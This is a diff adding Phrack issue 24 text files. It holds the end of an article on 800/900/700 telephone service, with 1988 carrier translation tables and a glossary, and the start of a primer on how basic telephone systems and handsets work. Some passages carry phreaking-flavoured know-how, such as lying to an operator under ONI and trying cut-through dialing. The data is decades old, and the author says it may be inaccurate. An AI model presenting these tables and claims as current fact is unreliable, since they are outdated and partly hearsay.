+                spills that are beyond the scope of this file.
+
+         II = 2 information digits.  Typical values are:
+
+         00  normal ANI .. 10 digits follow
+         01  ONI line ... NPA follows
+         02  ANI failure ... NPA follows
+
+         3/10D = 3 or 10 digits.  Either the NPA, or the entire 10 digit
+         number.  KP and ST are control tones.
+
+     5.  The carrier receives all of this (and probably throws the ANI into the
+         bit bucket) and translates the 800 number to what's called a PTN, or
+         Plant Test Number (for example, 617-555-9111).  Then, the call is
+         routed AS IF the customer had dialed that 10 digit number.  Of course,
+         the billing data is marked as an 800 call, so the subscriber receiving
+         the call pays the appropriate amount.
+
+
+Of the 800 possible NXXs, 409 are currently assigned.  A long-distance carrier
+can get one 800 and four 900 numbers just for the paperwork.  But to get more
+than that, you have to show that you're 70% full now, and demonstrate a real
+need for the capacity.
+
+I have included the entire 800-NXX to long-distance carrier translation table.
+Note that not every NXX is valid in every area.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                       Revised 800/OCN Translation Table
+                          Effective October 10, 1988
+
+
+221 ATX        222 ATX        223 ATX        224 LDL        225 ATX
+226 MIC        227 ATX        228 ATX        229 TDX        230 NTK
+231 ATX        232 ATX        233 ATX        234 MCI        235 ATX
+236 SCH        237 ATX        238 ATX        239 DLT        240 SIR
+241 ATX        242 ATX        243 ATX        244 ---        245 ATX
+246 ---        247 ATX        248 ATX        249 ---        250 ---
+251 ATX        252 ATX        253 ATX        254 TTU        255 ATX
+256 LSI        257 ATX        258 ATX        259 ---        260 ---
+261 SCH        262 ATX        263 CAN        264 ICT        265 CAN
+266 CSY        267 CAN        268 CAN        269 FDG        270 ---
+271 ---        272 ATX        273 ---        274 MCI        275 ITT
+276 ONE        277 SNT        278 ---        279 MAL        280 ADG
+281 ---        282 ATX        283 MCI        284 MCI        285 ---
+286 ---        287 ---        288 MCI        289 MCI        290 ---
+291 ---        292 ATX        293 PRO        294 ---        295 ---
+296 ---        297 ARE        298 ---        299 CYT
+
+321 ATX        322 ATX        323 ATX        324 HNI        325 ATX
+326 UTC        327 ATX        328 ATX        329 TET        330 TET
+331 ATX        332 ATX        333 MCI        334 ATX        335 SCH
+336 ATX        337 FST        338 ATX        339 ---        340 ---
+341 ATX        342 ATX        343 ATX        344 ATX        345 ATX
+346 ATX        347 UTC        348 ATX        349 DCT        350 CSY
+351 ATX        352 ATX        353 ---        354 ---        355 ---
+356 ATX        357 ---        358 ATX        359 UTC        360 ---
+361 CAN        362 ATX        363 CAN        364 HNI        365 MCI
+366 UTC        367 ATX        368 ATX        369 TDD        370 TDD
+371 ---        372 ATX        373 TDD        374 ---        375 TNO
+376 ---        377 GTS        378 ---        379 ---        380 ---
+381 ---        382 ATX        383 TDD        384 FDT        385 CAB
+386 TBQ        387 CAN        388 ---        389 ---        390 ---
+391 ---        392 ATX        393 EXF        394 ---        395 ---
+396 ---        397 TDD        398 ---        399 ARZ
+
+421 ATX        422 ATX        423 ATX        424 ATX        425 TTH
+426 ATX        427 ---        428 ATX        429 ---        430 ---
+431 ATX        432 ATX        433 ATX        434 AGN        435 ATX
+436 IDN        437 ATX        438 ATX        439 ---        440 TXN
+441 ATX        442 ATX        443 ATX        444 MCI        445 ATX
+446 ATX        447 ATX        448 ATX        449 ---        450 USL
+451 ATX        452 ATX        453 ATX        454 ALN        455 ---
+456 MCI        457 ATX        458 ATX        459 ---        460 ---
+461 CAN        462 ATX        463 CAN        464 ---        465 CAN
+466 ALN        467 ICT        468 ATX        469 ---        470 ---
+471 ALN        472 ATX        473 ---        474 ---        475 TDD
+476 TDD        477 ---        478 AAM        479 ---        480 ---
+481 ---        482 ATX        483 ---        484 TDD        485 TDD
+486 TDX        487 ---        488 ---        489 TOM        490 ---
+491 ---        492 ATX        493 ---        494 ---        495 ---
+496 ---        497 ---        498 ---        499 ---
+
+521 ATX        522 ATX        523 ATX        524 ATX        525 ATX
+526 ATX        527 ATX        528 ATX        529 MIT        530 ---
+531 ATX        532 ATX        533 ATX        534 ---        535 ATX
+536 ALN        537 ATX        538 ATX        539 ---        540 ---
+541 ATX        542 ATX        543 ATX        544 ATX        545 ATX
+546 UTC        547 ATX        548 ATX        549 ---        550 CMA
+551 ATX        552 ATX        553 ATX        554 ATX        555 ATX
+556 ATX        557 ALN        558 ATX        559 ---        560 ---
+561 CAN        562 ATX        563 CAN        564 ---        565 CAN
+566 ALN        567 CAN        568 ---        569 ---        570 ---
+571 ---        572 ATX        573 ---        574 AMM        575 ---
+576 ---        577 GTS        578 ---        579 LNS        580 WES
+581 ---        582 ATX        583 TDD        584 TDD        585 ---
+586 ATC        587 LTQ        588 ATC        589 LGT        590 ---
+591 ---        592 ATX        593 TDD        594 TDD        595 ---
+596 ---        597 ---        598 ---        599 ---
+
+621 ATX        622 ATX        623 ---        624 ATX        625 NLD
+626 ATX        627 MCI        628 ATX        629 ---        630 ---
+631 ATX        632 ATX        633 ATX        634 ATX        635 ATX
+636 CQU        637 ATX        638 ATX        639 BUR        640 ---
+641 ATX        642 ATX        643 ATX        644 CMA        645 ATX
+646 ---        647 ATX        648 ATX        649 ---        650 ---
+651 ---        652 ATX        653 ---        654 ATX        655 ---
+656 ---        657 TDD        658 TDD        659 ---        660 ---
+661 CAN        662 ATX        663 CAN        664 UTC        665 CAN
+666 MCI        667 CAN        668 CAN        669 UTC        670 ---
+671 ---        672 ATX        673 TDD        674 TDD        675 ---
+676 ---        677 ---        678 MCI        679 ---        680 ---
+681 ---        682 ATX        683 MTD        684 ---        685 ---
+686 LGT        687 NTS        688 ---        689 ---        690 ---
+691 ---        692 ATX        693 ---        694 ---        695 ---
+696 ---        697 ---        698 NYC        699 PLG
+
+720 TGN
+721 ---        722 ATX        723 ---        724 RTC        725 SAN
+726 UTC        727 MCI        728 TDD        729 UTC        730 ---
+731 ---        732 ATX        733 UTC        734 ---        735 UTC
+736 UTC        737 MEC        738 MEC        739 ---        740 ---
+741 MIC        742 ATX        743 EDS        744 ---        745 ---
+746 ---        747 TDD        748 TDD        749 TDD        750 ---
+751 ---        752 ATX        753 ---        754 TSH        755 ---
+756 ---        757 TID        758 ---        759 MCI        760 ---
+761 ---        762 ATX        763 ---        764 AAM        765 ---
+766 ---        767 UTC        768 SNT        769 ---        770 GCN
+771 SNT        772 ATX        773 CUX        774 ---        775 ---
+776 UTC        777 MCI        778 UTC        779 TDD        780 TDD
+781 ---        782 ATX        783 ALN        784 ALG        785 SNH
+786 *1         787 ---        788 ---        789 TMU        790 ---
+791 ---        792 ATX        793 ---        794 ---        795 ---
+796 ---        797 TID        798 TDD        799 ---
+
+821 ATX        822 ATX        823 THA        824 ATX        825 MCI
+826 ATX        827 UTC        828 ATX        829 UTC        830 ---
+831 ATX        832 ATX        833 ATX        834 ---        835 ATX
+836 TDD        837 TDD        838 ---        839 VST        840 ---
+841 ATX        842 ATX        843 ATX        844 LDD        845 ATX
+846 ---        847 ATX        848 ATX        849 ---        850 TKC
+851 ATX        852 ATX        853 ---        854 ATX        855 ATX
+856 ---        857 TLS        858 ATX        859 ---        860 ---
+861 ---        862 ATX        863 ALN        864 TEN        865 ---
+866 ---        867 ---        868 SNT        869 UTC        870 ---
+871 ---        872 ATX        873 MCI        874 ATX        875 ALN
+876 MCI        877 UTC        878 ALN        879 ---        880 NAS
+881 NAS        882 ATX        883 ---        884 ---        885 ATX
+886 ALN        887 ETS        888 MCI        889 ---        890 ---
+891 ---        892 ATX        893 ---        894 ---        895 ---
+896 TXN        897 ---        898 CGI        899 TDX
+
+921 ---        922 ATX        923 ALN        924 ---        925 ---
+926 ---        927 ---        928 CIS        929 ---        930 ---
+931 ---        932 ATX        933 ---        934 ---        935 ---
+936 RBW        937 MCI        938 ---        939 ---        940 TSF
+941 ---        942 ATX        943 ---        944 ---        945 ---
+946 ---        947 ---        948 ---        949 ---        950 MCI
+951 BML        952 ATX        953 ---        954 ---        955 MCI
+956 ---        957 ---        958 *2         959 *2         960 CNO
+961 ---        962 ATX        963 SOC        964 ---        965 ---
+966 TDX        967 ---        968 TED        969 TDX        970 ---
+971 ---        972 ATX        973 ---        974 ---        975 ---
+976 ---        977 ---        978 ---        979 ---        980 ---
+981 ---        982 ATX        983 WUT        984 ---        985 ---
+986 WUT        987 ---        988 WUT        989 TDX        990 ---
+991 ---        992 ATX        993 ---        994 ---        995 ---
+996 VOA        997 ---        998 ---        999 MCI
+
+Notes
+~~~~~
+*1 -- Released For Future Assignment
+*2 -- These NXX codes are generally reserved for test applications; They
+      may be reserved for Access Tandem testing from an End Office.
+
+Note also:  The following NXXs are dedicated for RCCP (Radio Common Carrier
+Paging) under the discretion of the local exchange carrier:
+
+202, 212, 302, 312, 402, 412, 502, 512, 602, 612, 702, 712, 802, 812, 902,
+and 912.
+
+
+OCN Reference List
+~~~~~~~~~~~~~~~~~~
+ADG - Advantage Network, Inc.             AGN - AMRIGON
+ALG - Allnet Communication Services       AMM - Access Long Distance
+AAM - ALASCOM                             ARE - American Express TRS
+ARZ - AmeriCall Corporation (Calif.)      ATC - Action Telecom Co.
+ATX - AT&T                                BML - Phone America
+BUR - Burlington Tel.                     CAB - Hedges Communications
+CAN - Telcom Canada                       CNO - COMTEL of New Orleans
+CQU - ConQuest Comm. Corp                 CSY - COM Systems
+CUX - Compu-Tel Inc.                      CYT - ClayDesta Communications
+DCT - Direct Communications, Inc.         DLT - Delta Communications, Inc.
+EDS - Electronic Data Systems Corp.       ETS - Eastern Telephone Systems, Inc.
+EXF - Execulines of Florida, Inc.         FDG - First Digital Network
+FDN - Florida Digital Network             FDT - Friend Technologies
+FST - First Data Resources                GCN - General Communications, Inc.
+GTS - Telenet Comm. Corp.                 HNI - Houston Network, Inc.
+ITT - United States Transmission System   LDD - LDDS-II, Inc.
+LDL - Long Distance for Less              LGT - LITEL
+LNS - Lintel Systems                      LSI - Long Distance Savers
+LTQ - Long Distance for Less              MAL - MIDAMERICAN
+MCI - MCI Telecommunications Corp.        MDE - Meade Associates
+MEC - Mercury, Inc.                       MIC - Microtel, Inc.
+MIT - Midco Communications                MTD - Metromedia Long Distance
+NLD - National Data Corp.                 NTK - Network Telemanagement Svcs.
+NTS - NTS Communications                  ONC - OMNICALL, Inc.
+ONE - One Call Communications, Inc.       PHE - Phone Mail, Inc.
+PLG - Pilgrim Telephone Co.               PRO - PROTO-COL
+RBW - R-Comm                              RTC - RCI Corporation
+SAN - Satelco                             SCH - Schneider Communications
+SDY - TELVUE Corp.                        SIR - Southern Interexchange Services
+SLS - Southland Systems, Inc.             SNH - Sunshine Telephone Co.
+SNT - SouthernNet, Inc.                   SOC - State of California
+TBQ - Telecable Corp.                     TDD - Teleconnect
+TDX - Cable & Wireless Comm.              TED - TeleDial America
+TEM - Telesystems, Inc.                   TEN - Telesphere Network, Inc.
+TET - Teltec Savings Communications Co    TGN - Telemanagement Consult't Corp.
+THA - Touch America                       TID - TMC South Central Indiana
+TKC - TK Communications, Inc.             TLS - TELE-SAV
+TMU - Tel-America, Inc.                   TNO - ATC Cignal Communications
+TOM - TMC of Montgomery                   TOR - TMC of Orlando
+TSF - SOUTH-TEL                           TSH - Tel-Share
+TTH - Tele Tech, Inc.                     TTU - Total-Tel USA
+TXN - Tex-Net                             USL - U.S. Link Long Distance
+UTC - U.S. Telcom, Inc. (U.S. Sprint)     VOA - Valu-Line
+VST - STAR-LINE                           WES - Westel
+WUT - Western Union Telegraph Co.
+
+NOTE:  Where local telcos, such as Illinois Bell, offer 800 service, they
+       purchase blocks of numbers from AT&T on prefixes assigned to AT&T.  They
+       are free to purchase blocks of numbers from any carrier of their choice
+       however.
+
+       This list also applies to the 900/OCN Translation Table (presented later
+       in this file).
+
+
+900 Service
+~~~~~~~~~~~
+As I mentioned earlier there are two flavors of 900 service, AT&T and
+"everybody else."  Everybody else is handled exactly as the 800 service above,
+except the IEC will probably use the ANI information to send you a bill
+(either directly, or through your BOC, each situation governed by applicable
+tariffs and contractual arrangements between the IEC and the BOC).
+
+AT&T 900 is a curious monster indeed.  It was designed as a "mass termination"
+service.  When you dial a 900  by AT&T (such as the "hear space shuttle
+mission audio" number) you get routed to one of twelve "nodes" strewn
+throughout the country.  These nodes are each capable of terminating 9,000
+calls >PER SECOND<.  There are several options available where the customer
+and/or the IP pay for all/part of the call.  The big difference between 800 and
+AT&T 900 is >NOT< "who pays for the call" (there are free 900 numbers), but
+"how many people can it handle at once."  The IP is responsible for providing
+program audio.  AT&T is prohibited from providing audio-program services (i.e.
+tape recorded messages).  As with any rule, there are exceptions to these as
+well.
+
+I have included the entire 900-NXX to long-distance carrier translation table.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                       Revised 900/OCN Translation Table
+                          Effective October 10, 1988
+
+Please note that this differs from the 800 table, because much fewer of the 900
+NXXs are assigned.
+
+NXX OCN         NXX OCN         NXX OCN         NXX OCN         NXX OCN
+
+200 ATX         202 Ameritech   210 ATX         220 ATX         221 TDX
+222 ONC         223 TDX         225 Pac. Bell   226 MCI         233 TDX
+234 TEN         240 U.S. West   248 Ameritech   250 ATX         258 TEN
+254 TTU         255 SNT         260 ATX         264 ADG         266 CSY
+272 Bell Atl.   273 CAN         275 ITT         280 Ameritech   282 LGT
+283 Pac. Bell   288 GTE N.west  297 CAN         300 ATX         301 Ameritech
+302 Ameritech   303 Pac. Bell   321 TEN         322 TDX         327 ETS
+328 ATX         331 TET         332 PLG         333 U.S. West   335 Bell Atl.
+342 ATX         344 ATX         345 ALN         346 United Tel. 350 ATX
+364 GTE N.West  366 ONC         369 TEN         370 ATX         377 GTS
+386 United Tel. 388 SNT         399 ARZ         400 ATX         407 ATX
+410 ATX         420 ATX         422 ALN         426 PLG         428 Ameritech
+430 U.S. West   444 ONC         445 PHE         446 MCI         450 Ameritech
+451 CAN         456 TEN         463 United Tel. 478 AAM         479 ARZ
+480 ATX         483 GTE Midwest 488 ONC         490 U.S. West   500 ATX
+505 Pac. Bell   520 ATX         529 MIT         536 BUR         540 ALN
+543 ALN         545 GTE Calif.  550 ALN         555 ATX         567 ALN
+580 U.S. West   590 ATX         595 CAN         600 ATX         620 Ameritech
+624 Pac. Bell   626 CSY         628 Ameritech   630 CAN         633 MIT
+639 PLG         643 CAN         645 CAN         650 ATX         654 TEN
+656 SNT         660 ATX         661 United Tel. 663 MDE         665 ALN
+666 ONC         670 CAN         677 CAN         678 MCI         680 ATX
+686 LTG         690 CAN         698 NY Tel.     699 PLG         701 Bell Atl.
+710 TGN         720 ATX         722 Pac. Bell   724 RTC         725 SNT
+727 GTE Calif.  730 ATX         739 CSY         740 ATX         741 TEN
+746 ITT         750 CAN         753 ALN         765 ALN         773 ATX
+777 Pac. Bell   778 Ameritech   780 Ameritech   786 ATX         790 CAN
+792 CAN         801 Bell Atl.   820 ATX         830 CAN         843 Pac. Bell
+844 Pac. Bell   847 United Tel. 850 ATX         860 ATX         866 AAM
+870 CAN         872 TEN         887 ETS         888 CIS         900 TDX
+901 Bell Atl.   903 ATX         909 ATX         924 Ameritech   932 ATX
+948 ARZ         949 MIC         963 TEN         970 MIC         971 MIC
+972 MIC         973 MIC         974 ALN         975 ALN         976 ATX
+988 MCI         990 MCI         991 ALG         993 SNT         999 TEN
+
+
+700 Service
+~~~~~~~~~~~
+The last SAC we'll deal with is 700.  I've seen ads on late-night television
+for Group Access Bridging service (GAB) under 700 numbers, with an elephantine
+dialing sequence.  The one that comes to mind is 10041-1-700-777-7777.  If you
+were to dial 1-700-555-4141 you will hear a recording announcing your
+Equal-Access carrier.  (Some carriers ignore the last four digits, and any
+700-555 number will give the announcement).
+
+This is signalled the same as 800 service, and may or may not be billed
+ENTIRELY at the discretion of the IEC.  In New York, under PSC tariff, you can
+order 900 and/or 700 blocking as well as 976, 970, 550, and 540 blocking in
+various combinations.
+
+What in ONE carrier might be a customer service hotline (Dial 1-700-I AM LOST)
+might for another be a revenue product.  There is LITTLE standardization of 700
+usage from IEC to IEC.
+
+The one last dialing pattern that is worth mentioning is what's called, "cut
+through dialing."  Try dialing 10220.  If Western Union comes to your
+town, you'll get a FG-A style dial tone.  Presumably if you had a Western
+Union "Calling Card" you could dial a call.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                                   Glossary
+                                   ~~~~~~~~
+ANI - Automatic Number Identification.  An MF sequence that identifies your
+      line for toll billing information.  Often confused with ANAC (Automatic
+      Number Announcement Circuit) which reads your number back in a
+      synthesized voice.
+
+BOC - Bell Operating Company.  An often misused term that in general usage
+      means, "Your local exchange carrier."  Since most of the telephones in
+      the country are served by what used to be the Bell system, we tend to use
+      the term.  The proper term in this case, however IS "Exchange Carrier
+      [EC]"  They provide service within your LATA.
+
+FG-A - Feature Group A.  Line Side termination for Long Distance carriers.  The
+       old 555-1234 for Widget Telephone Company then dial an access code and
+       the number style dialing is called FG-A.
+
+FG-B - Feature Group B.  Trunk Side termination for Long Distance carriers.
+       (aka ENFIA B).  950 service.  This is LATA wide service, and doesn't
+       cost the customer message units.  ANI is only provided when the trunks
+       terminate in the End Office (as opposed to an access tandem).
+
+FG-D - Feature Group D.  Trunk Side termination.  Provides 10xxx dialing, 1+
+       pre-subscription dialing, and Equal Access 800/900 service.  Only
+       available in electronic offices and some 5XB offices (through a beastie
+       called an Adjunct Frame.)
+
+GAB - Group Audio Bridging.  Where several people call the same number, to talk
+      to other people calling the same number.  "Party" or "Chat" lines.
+
+IEC - Inter-Exchange Carrier.  Someone who actually carries calls from place to
+      place.  AT&T, Sprint, MCI are all IECs.
+
+IP - Information Provider.  Someone who sells a value-added service over the
+     telephone.  Where you pay for the INFORMATION you're receiving, as well as
+     the cost of TRANSPORT of the call.
+
+NXX - Notation convention for what used to be called a "prefix".  N represents
+      the digits 2 through 9, and X represents the digits 0 through 9.  There
+      are 800 valid NXX combinations, but some are reserved for local use.
+      (411 for Directory, 611 for Repair Bureau, 911 for emergency, etc.)
+
+ONI - Operator Number Identification.  In areas with some styles of party-line
+      service, the CO cannot tell who you are, and the operator will come on
+      and say, "What number are you calling from?".  You can lie, they have to
+      trust you.  They MAY know which PREFIX you're coming from, though.
+
+PTN - Plant Test Number.  A regular 10 digit number assigned with your inward
+      WATS line.  This may NOT be a 'dialable' number from the local CO.  (A
+      friend has a WATS line in Amherst, MA [413-549, 
+      dial the PTN locally, but you can if you come in on a toll trunk.)
+
+SAC - Special Area Code.  Bellcore speak for area codes that aren't really
+      places, but classes of service.
+_______________________________________________________________________________
diff --git a/phrack24/9.txt b/phrack24/9.txt
new file mode 100644
index 0000000..ec0f5ee
--- /dev/null
+++ b/phrack24/9.txt
@@ -0,0 +1,390 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 24, File 9 of 13
+
+         /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
+         |                                                          |
+         |            Lifting Ma Bell's Cloak Of Secrecy            |
+         |            ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~            |
+         |           A New Look At Basic Telephone Systems          |
+         |                                                          |
+         |                         by VaxCat                        |
+         |                                                          |
+         \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
+
+
+Though telephones predate radio communications by many years, they aren't
+nearly as simple as they appear at first glance.  In fact, some aspects of
+telephone systems are most interesting and quite ingenious.  In this file, I
+will describe some of these more interesting and perhaps less well-known areas
+of telephone systems.  Before going any further, let me explain and apologize
+for the fact that some of the information in this file may not be altogether
+complete, up to date, or even totally correct.
+
+I do not work for any phone company, and therefore, I do not have unlimited
+access to internal telephone company literature.  Moreover, there is very
+little material available in books or magazines which describes how United
+States telephone systems work.  Much of the information in this file has been
+obtained piece-meal from many different sources such as books, popular
+magazines, computer data communications journals, handbooks, and sometimes just
+plain hearsay.
+
+I have tried to correlate as much as possible all the little bits and pieces
+into a coherent picture which makes sense, but there is no easy way to be sure
+of all the little details.  So think of this article as if it is a historical
+novel - generally accurate and, regardless of whether it is completely true or
+not, fascinating.  With this out of the way, let's go on.
+
+You, as a customer, are generally referred to as the "subscriber."  Your
+telephone connects to the Central Office through a two-wire cable which may be
+miles long, and which may have a resistance on the order of hundreds or even
+thousands of Ohms.  This cable is essentially a balanced line with a
+characteristic impedance of around 900 Ohms, but this varies greatly with
+different cables, different weather conditions, and different calls.  This is
+why it is so hard to keep a hybrid phone-patch balanced.
+
+The main power in the central office comes from 48 volt storage batteries which
+are constantly kept trickle-charged.  This battery is connected to your line
+through a subscriber relay and a balanced audio transformer.  The relay is
+sensitive enough to detect even quite small currents through your line.
+
+The buttons which stick up out of your telephone case when you lift the handset
+activate the hook switch.  The name probably dates back to the days when the
+handset (or even earlier, the earpiece) hung on the side of the phone from a
+hook.  In any case, when your phone is hung up it is said to be on the hook,
+and when you lift the handset to make a call it is said to go off the hook.
+With the phone on hook, the line is connected only to the bell (called the
+ringer).  Because the bell circuit has a capacitor in it, no DC current can
+flow through the phone.  As a result, the subscriber relay back in the central
+office will be de-energized, indicating to the central office (let's abbreviate
+that as CO from now on) that your phone is hung up.
+
+Since there is no current through your line or phone, there is no voltage drop
+anywhere, and so if you measure the voltage across the phone line at your phone
+you will see the entire 48 volts (or even more if the CO batteries are well
+charged).
+
+The positive (grounded) lead is called the tip and the negative lead is called
+the ring; these names correspond to the tip and ring of a three-circuit phone
+plug.  Now suppose you want to place a call; You pick up the handset and the
+phone goes off the hook.  This completes the DC circuit through the dial,
+microphone, and the hybrid network which is basically a complicated transformer
+circuit.
+
+At this point current starts to flow from the battery through your line and
+phone, and the subscriber relay back at the CO pulls in.  The line voltage
+across your phone now drops to just a few volts because the line is loaded down
+by the low resistance of the phone.  The CO now searches for some idle dialing
+circuits, and when it finds them, connects a dial tone back to your phone.
+When you hear this, you start dialing.
+
+So lets talk about rotary dial, the type of phone which you turn with your
+finger (we will talk about Touchtone dials later).  When you dial a number, the
+dial acts as a short circuit until you release the dial and let the built-in
+spring return it back to the resting position.  As it is returning, it starts
+to open and close the circuit in sequence to indicate the number you dialed.
+If you dial a 1, it opens the circuit once; if you dial a 9 it opens the
+circuit nine times.  As the dial is returning it cause the subscriber relay to
+open and close in step.  This enables the CO to recognize the number you want.
+When you finish dialing, the dial becomes just a plain short circuit which
+passes current through the microphone and the hybrid network.  Since the mike
+is a carbon unit, it needs this current to work.  When the CO receives he
+complete number, it starts to process your call.  If you dialed another
+subscriber in the same area, it may connect you directly to that subscriber's
+line.  Calls to phones a little further away may have to be routed through
+another CO, while long distance calls may go through one or more long distance
+switching centers (called tandems) and possibly many other CO's before arriving
+at the destination.  At the completion of this process, you may get either a
+ringing signal, indicating that the phone at the other end is ringing, one of
+several types of busy signals, or possibly just silence, if something goes
+wrong somewhere.
+
+When you talk to the person at the other end, the cable carries audio in both
+directions at the same time.  Your carbon microphone varies the current in your
+circuit, and this current variation is detected by a balanced transformer in
+the CO.  At the same time, audio coming back to your phone goes through the
+hybrid network to your earphone.  In phone company lingo they like to call the
+mike a transmitter, and the earphone is called the receiver.
+
+You may be interested in the makeup of the various tones you may hear on your
+telephone; these tones are important to people such as computer communications
+designers who have to build equipment which will recognize dial or other
+signaling tones:
+
+     Dial tone in older exchanges may still be a combination of 120 and 600 Hz,
+     but the newer exchanges use a combination of 350 and 440 Hz.  There is
+     often a slight change in the DC line voltage at the beginning of dial
+     tone, and this may also be detected.
+
+     Busy signal is a combination of 480 and 620 Hz which alternates for 1/2
+     second on and 1/2 second off (i.e., 60 interruptions per minute) when the
+     party you are calling is busy.
+
+     The same busy signal may be used for other conditions such as busy
+     interoffice or long distance circuits, but would then be interrupted
+     either 30 times a minute or 120 times per minute.  This is a standard
+     agreed on by an international telecommunications organization called CCITT
+     (and I don't offhand remember the French words it stands for), but
+     occasionally other frequencies up to 2 kHz are used.  A siren-like sound
+     varying between 200 and 400 Hz is often used for other error conditions.
+
+     The ringing tone, which you hear coming back to you when the phone rings
+     on the other end of the connection, is nowadays mostly a combination of
+     440 and 480 Hz, but there is great variation between CO's.  Very often a
+     higher frequency such as 500 Hz is interrupted at 20 Hz, and other tones
+     are used as well.  The tone is usually on for 2 seconds and off for 4
+     seconds.
+
+     The ringing current, actually used to ring the bell in a telephone, is an
+     AC voltage since it has to activate a ringer which has a capacitor in
+     series with it.  Different companies use different ringing currents, but
+     the most common is 90 volts at 20 Hz.  Since a typical phone may be
+     thousands of feet away from the CO, the thin wires used may have a fairly
+     high line resistance.  Hence only a relatively small current can be
+     applied to the bell, certainly not enough to ring something like a
+     doorbell.  This problem is solved by making the bell resonant mechanically
+     at the ringing frequency so that even a fairly small amount of power is
+     enough to start the striker moving hard enough to produce a loud sound.
+     This is the reason why a low-frequency AC is used.  Although this raises
+     some problems in generating a 20 Hz signal at a high enough voltage, it
+     has the advantage that a bell will respond to a ringing current only if
+     the frequency is quite close to the bell's naturally resonant frequency.
+     If you build two bells, one resonant at 20 Hz and the other resonant at 30
+     Hz, and connect them together to the same line, you can ring just one bell
+     at a time by connecting a ringing current of the right frequency to the
+     line; this has some useful applications in ringing just one phone on a
+     party line.
+
+Now let's look at some of the components of the phone itself.  We will consider
+the most common new phone, a model 500 C/D manufactured by Western Electric and
+used by Bell System affiliated phone companies.  This is the standard desk
+phone, having modern rounded lines and usually having a G1 or G3 handset.  It
+was developed about 1950 and replaced the older 300-series phones which had the
+older F1 handset and had sharper corners and edges.  There was an in between
+phone, where they took an old 300-series phone and put a new case on it which
+resembled the 500-style case, but had a straight up and down back - the back of
+the case came straight down right behind the handset cradle, whereas the true
+500-style telephone has what looks like a set sticking out behind the cradle).
+
+If you are still in doubt as to which phone you have, the bell loudness control
+is a wheel on the 500-type phone and a lever on the 300-type.  If you live in
+the boondocks, you may still have the 200-type phone (sometimes called the
+ovalbase) or maybe even the desk-stand type that looked like a candlestick,
+with the microphone mounted on the top and the earpiece hanging on the side
+from a hook.
+
+Neither of these phones had a built in bell, and so you probably have a bell
+box attached to your wall.  If you have a phone with a handle on the side which
+you crack to call the operator, the following does not apply to your phone!
+
+Now lets discuss the bell circuit, which consists of a two-coil ringer and a
+0.5 uF capacitor.  On Western Electric phones the capacitor is mounted inside
+the network assembly, which also has a large number of screws on top which act
+as connection points for almost everything inside the phone.  I have never
+been able to find out why the ringer has two coils of unequal resistance, but
+it apparently has something to do with determining which subscriber on a party
+line makes which call.  In most phones, the yellow and the green wires are
+connected together at the wall terminal block so that the bell is connected
+directly across the telephone line; disconnecting the yellow lead would turn
+off the bell (although sometimes the connection is made internally by
+connecting the black lead from the ringer directly to the L1 terminal, in which
+case the yellow lead is disconnected.
+
+You may wonder why a yellow lead is needed at all when only two wires are
+normally used anyway.  It is true that only two wires enter the house from the
+outside; one of these is the tip and the other is the ring.  In a non-party
+line the ringing current as well as all talk voltages are applied between the
+tip and the ring, and it doesn't actually matter which of the phone leads goes
+to the tip and which to the ring if you have a rotary dial phone.  If you have
+a Touchtone dial, then you have to observe polarity so that the transistor
+circuit in the dial works, in which case you have to make sure that the green
+lead goes to the tip and the red lead goes to the ring.
+
+The yellow lead is commonly used for party lines.  On a two-party line ringing
+current from the CO is applied not between the two lines, but between one line
+and ground.  In that case the yellow lead goes to ground while the other side
+of the ringer (the red lead) is connected to either the tip or the ring,
+depending on the party.  In this way, it is possible to ring only one party's
+bell at a time.
+
+The remaining connections inside the telephone are varistors; the phone
+companies must be the world's biggest users of these devices, which are
+variable resistors whose resistance drops as the voltage across them rises.
+Their function in the phone set is to short out parts of the set if the applied
+voltage gets too high.
+
+The hook switch actually has three sets of contacts, two normally open (open,
+that is, when the hand set is on hook) which completes the DC circuit when you
+pick up the handset, and a normally closed contact which is wired directly
+across the earphone.  This contact's function is to short the earphone during
+the time that the DC circuit is being opened or closed through the phone - this
+prevents you from being blasted by a loud click in the earphone.
+
+The dial has two contacts.  One of these is the pulsing contact, which is
+normally closed and only opens during dialing on the return path of the dial
+after you let go of it.  The second contact (the off-normal contact), shorts
+the earphone as soon as you start turning the dial, and releases the short only
+after the dial returns back to the normal position.  In this way you do not
+hear the clicking of the dial in the phone as you dial.  Finally, the phone has
+the hybrid network which consists of a four-winding transformer and whole
+collection of resistors, capacitors, and varistors.  The main function of the
+network is to attenuate your own voice to lower its volume in your earphone.
+
+The simplest phone you could build would be just a series circuit consisting of
+a dial, a mike, and an earphone.  But the signals coming back from the other
+party so much weaker than your own signals, that than earphone sensitive enough
+to reproduce clearly and loudly the voice of the other person would then blast
+your eardrums with the sound of your own voice.  The function of the network is
+to partially cancel out the signal produced by the local mike, while permitting
+all of the received signal to go to the earphone.  This technique is similar to
+the use of the hybrid phone patch with a VOX circuit, where you want the voice
+of the party on the telephone to go to your transmitter, but want to keep the
+receiver signal out the transmitter.
+
+In addition to the parts needed for the hybrid, the network also contains a few
+other components (such as the RC network across the dial pulsing contacts) and
+screwtype connection points for the entire phone.
+
+A Touchtone phone is similar to the dial phone described above, except that the
+rotary dial is replaced by a Touchtone dial.  In addition to its transistorized
+tone generator, the standard Touchtone pad has the same switch contacts to mute
+the earphone, except that instead of completely shorting the earphone, as the
+rotary dial does, the Touchtone dial switches in a resistor which only
+partially mutes the phone.
+
+It is fairly common knowledge as to what frequencies are used for Touchtone
+signalling, but a it never hurts to reiterate information.  Each digit is
+composed of one frequency from the low group and one frequency from the high
+group; for instance, the digit 6 is generated by producing a low tone of 770 Hz
+(Hertz) and a high tone of 1477 Hz at the same time.  The American Touchtone
+pads generate both of these tones with the same transistor, while European pads
+(yes, there are some) use two transistors, one for reach tone.  In addition to
+the first three high tones, a fourth tone of 1633 Hz has been decided on for
+generating four more combinations.  These are not presently in use, although
+the standard phone Touchtone pad can easily be modified to produce this tone,
+since the required tap on the inductor used to generate the the tone is already
